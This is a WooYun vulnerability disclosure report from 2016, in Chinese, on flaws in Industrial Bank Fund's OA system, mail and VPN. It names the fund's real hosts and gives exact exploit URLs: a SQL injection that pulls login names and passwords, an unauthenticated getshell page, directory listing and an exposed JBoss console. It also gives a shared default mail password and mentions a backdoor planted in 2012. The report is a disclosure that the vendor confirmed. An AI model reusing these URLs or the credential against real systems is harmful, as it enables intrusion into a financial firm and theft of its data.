漏洞概要
关注数(24)
关注此漏洞
漏洞标题:基金安全之兴业基金OA、VPN、邮箱多个漏洞导致多姿势入内网(涉及大量财务运营数据\发现2012年后门)
提交时间:2016-01-12 18:32
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:命令执行
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开
简要描述:
收益随随便便就几千万上亿,还有好多投资公司的信息
详细说明:
问题系统:
http://oa.cib-fund.com.cn/
1.这垃圾系统全是漏洞,可以直接获取shell:
WooYun: 泛微OA未授权可导致GetShell(简单粗暴,无需登录)
http://oa.cib-fund.com.cn/sysinterface/extpage/cssroot.jsp
2012年就被坏人shell了
2.sql注入:
http://oa.cib-fund.com.cn//ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,123442105,LOGONPASS%20from%20SYSUSER
漏洞证明:
3.邮箱大量通用密码:Cib12345 ,还有很多是弱口令
下面这么多邮箱都能登录,涉及的全是财务相关的,动不动就几十亿,吓傻了,不多贴了
</code>
4.邮箱之后是vpn通用,上面的账号全能登录
5.列目录漏洞:
http://oa.cib-fund.com.cn//document/imp/filebrowser.jsp?dir=c:
6.外送jboss命令执行,同样可以getshell,就不演试了
http://oa.cib-fund.com.cn:90/jmx-console/
修复方案:
这是提交了多少个漏洞,后门请自查、自删除。
声明:好人一枚,发现即提交
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-01-12 18:41
厂商回复:
谢谢白帽子提醒
最新状态:
暂无
漏洞评价:
评价
-
2016-01-12 20:05 |
Hogns ( 普通白帽子 | Rank:128 漏洞数:20 | 呵呵哒)
-
2016-01-13 00:39 |
zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)